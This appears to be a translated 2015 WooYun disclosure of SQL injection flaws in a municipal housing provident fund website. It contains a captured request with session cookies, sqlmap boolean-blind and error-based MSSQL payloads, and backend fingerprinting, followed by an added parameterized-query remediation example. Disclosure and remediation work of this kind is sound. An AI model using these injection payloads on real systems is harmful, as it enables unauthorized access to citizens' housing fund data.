
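Vulnerability Summary (followers: 24)

Bug ID: wooyun-2015-0134375

Title: SQL injection with DBA privileges at the Sanming Housing Provident Fund Center (bundled submission)

Vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-08-18 23:14

Fixed: 2015-10-03 11:30

Published: 2015-10-03 11:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]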



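Vulnerability Details

Disclosure status:

2015-08-18: Details reported to the vendor; awaiting vendor handling
2015-08-19: CNCERT has not yet been able to reach the affected organization; details disclosed only to the notifying agencies
2015-08-29: Details disclosed to core white hats and experts in related fields
2015-09-08: Details disclosed to regular white hats
2015-09-18: Details disclosed to trainee white hats
2015-10-03: Details disclosed to the public

Brief description:

Kept looking and found several more, so I am submitting them all together!~~~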

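Detailed description:

1.
URL:

http://**.**.**.**/PublicInfoList.aspx

http://**.**.**.**/PublicInfoList.aspx?key=1&type=1&department=&begindate=&enddate=

The key and department parameters are injectable.

[Screenshots: 1.jpg, 2.jpg, 3.jpg]

2.
URL:

http://**.**.**.**/InformationView.aspx?InfoCode=0e4c819f-9bc9-4c9e-b834-0b88dbc825c1

The InfoCode parameter is injectable.

[Screenshots: 4.jpg, 5.jpg, 6.jpg]

3.

http://**.**.**.**/NewsBolckSecondList.aspx?class=d0f31435-11a7-4f41-bf35-11260336cb99&parentclass=c4c7a08a-5dbd-4791-88ee-d82af4ce4f8a

The parentclass parameter is injectable.

[Screenshots: 7.jpg, 8.jpg, 9.jpg]

As before, retrieving data afterwards did not go smoothly, so I will leave it at that~~~~

Proof of vulnerability:

Another instance
1. Captured request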

POST http://**.**.**.**/LoanableEstate.aspx?class=9b96343b-0051-4bc1-a63c-3dbf6da619a3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**/LoanableEstate.aspx?class=9b96343b-0051-4bc1-a63c-3dbf6da619a3
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 7699
Connection: Keep-Alive
Pragma: no-cache
Cookie: _gscbrs_477307201=1; _gscu_477307201=39621761kckh7n12; _gscs_477307201=t396319695op56219|pv:3; ASP.NET_SessionId=j4wpzi45gqjugy45vbyo15rs; DBInformation=DBInformation_T_Information_T_Information.Clicks=,f04afaa5-4f96-48a2-8836-48d535f49909Guest,; SiteFunction=SiteFunction_House=,1208,
__VIEWSTATE=[...]&__EVENTVALIDATION=[...]&txtKey=1&ddlType=1&btnSearch=%E6%9F%A5%E6%89%BE&ddlPageIndex=1&HomePageBottomInfo1%24dlsthzdw=&HomePageBottomInfo1%24dlstzfbm=&HomePageBottomInfo1%24dlstqtgjj=&HomePageBottomInfo1%24dlstqtwz=


The txtKey parameter is injectable.
2. Using the trusty tool sqlmap

sqlmap identified the following injection points with a total of 1191 HTTP(s) requests:
---
Place: POST
Parameter: txtKey
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=[...]&__EVENTVALIDATION=[...]&txtKey=1%' AND 5886=5886 AND '%'='&ddlType=1&btnSearch=%E6%9F%A5%E6%89%BE&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=[...]&__EVENTVALIDATION=[...]&txtKey=1%' AND 2828=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(108)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (2828=2828) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(103)+CHAR(114)+CHAR(113))) AND '%'='&ddlType=1&btnSearch=%E6%9F%A5%E6%89%BE&ddlPageIndex=1&HomePageBottomInfo1$dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageBottomInfo1$dlstqtwz=
---
[18:09:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


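[Screenshots: 1.jpg, 2.jpg]

Still having some trouble retrieving information; maybe it needs a tamper script or manual work? Not going any further!~~~

Suggested fix:

Fix by filtering input

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)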
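
The report's fix note says only to filter input. As an added example (not code from the report or from the affected site), the sketch below shows the txtKey-style LIKE search and a GUID parameter such as InfoCode handled with bound parameters and strict parsing instead. Python's sqlite3 stands in for the ASP.NET/SQL Server stack; the table, columns, function names and rows are hypothetical and constructed.

```python
import sqlite3
import uuid

# Probe string copied from the sqlmap output above (boolean-based blind test).
PROBE = "1%' AND 5886=5886 AND '%'='"


def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE estate (code TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO estate VALUES (?, ?)", [
        ("0e4c819f-9bc9-4c9e-b834-0b88dbc825c1", "Tower 1 North Road"),
        ("d0f31435-11a7-4f41-bf35-11260336cb99", "Riverside Garden"),
        ("c4c7a08a-5dbd-4791-88ee-d82af4ce4f8a", "100% Plaza"),
    ])
    return db


def search_vulnerable(db, key):
    """'Before': request text is concatenated into the statement."""
    sql = "SELECT name FROM estate WHERE name LIKE '%" + key + "%' ORDER BY name"
    return [row[0] for row in db.execute(sql)]


def escape_like(text, esc="!"):
    """Make the escape char, % and _ literal so input cannot widen the match."""
    for ch in (esc, "%", "_"):
        text = text.replace(ch, esc + ch)
    return text


def search_safe(db, key, max_len=50):
    """'After': the key travels as a bound parameter, never as SQL text."""
    if len(key) > max_len:
        raise ValueError("search key too long")
    sql = "SELECT name FROM estate WHERE name LIKE ? ESCAPE '!' ORDER BY name"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(key) + "%",))]


def get_by_code_safe(db, info_code):
    """GUID-style parameters: parse strictly, then bind the canonical form."""
    try:
        code = str(uuid.UUID(info_code))
    except (ValueError, AttributeError, TypeError):
        return None  # not a GUID: reject before any query runs
    row = db.execute("SELECT name FROM estate WHERE code = ?", (code,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, key=1    :", search_vulnerable(db, "1"))
    print("vulnerable, key=PROBE:", search_vulnerable(db, PROBE))
    print("safe,       key=PROBE:", search_safe(db, PROBE))
    print("safe,       key=%    :", search_safe(db, "%"))
    print("GUID lookup          :",
          get_by_code_safe(db, "0e4c819f-9bc9-4c9e-b834-0b88dbc825c1"))
```

On the stack named in the sqlmap output, the equivalent is a SqlCommand whose values are passed as SqlParameter objects. Because the title reports DBA privileges, the web application's database login should also be reduced to the rights the site needs.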


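Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-19 11:28

Vendor reply:

CNVD confirmed and reproduced the situation described, and it has been passed by CNCERT to the Fujian branch center, which will follow up and coordinate with the organization that manages the website to handle it.

Latest status:

None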